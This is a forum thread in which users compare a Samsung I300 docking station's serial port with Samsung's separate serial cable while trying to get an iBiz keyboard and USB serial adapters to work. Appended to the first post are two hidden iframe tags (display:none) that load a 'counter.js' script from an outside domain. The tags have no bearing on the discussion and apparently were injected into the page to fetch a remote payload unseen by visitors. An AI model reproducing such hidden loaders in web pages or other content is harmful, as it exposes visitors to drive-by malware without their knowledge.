+ Reply to Thread

Difference between docking station serial and purchased serial cable

OK - so what's the difference? Obviously the docking station's serial port is good enough to sync with a real serial port, but not good enough (from other posts) to sync with a usb serial adapter...

I've purchased the ibiz keyboard and had zero luck getting it to work with the included serial port on the back of the docking station...

Other's have mentioned that they have gotten the USB serial adapter's to work when hooked up to Samsung's serial cable (and not the docking station..)

...so what's the difference here? It's got to be something simple internally that the docking station is doing... anyone good with a multiprobe want to check out the differences?

-mark

PS - I've 2nd-day ordered (tuesday) some accessories including the serial cable from samsung's site.. (havent' received them, or a shipping confirmation yet thoguh..) - so I'll try the ibiz keyboard w/ the samsung serial cable when I can.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Good luck with getting the keyboard to work with the I300. A number of users have attempted this to no avail as of now, going as far as downloading drivers dedicated to the Visor. At this point, I am prepared to say that there is no compatible keyboard for the I300. Samsung has succeeded apparently and will certainly benefit from their poor efforts to keep us informed. I do hope someone proves me wrong and finds a keyboard that does function, however. Keep us posted.

Technically, I dunno what the differences are. But, the cable is a helluva lot smaller, and with the travel charger (purchased separately), it provides all of the functionality (except charging a second battery simultaneously).

Actually, the CABLE provides MORE, and appears to behave more like std Palm synch stuff (except for the connector..). I was able to get a USB converter to work with the CABLE, but NOT the CRADLE. Go figure... 'Guess that's how they get you to spend more $ on the accessories... ...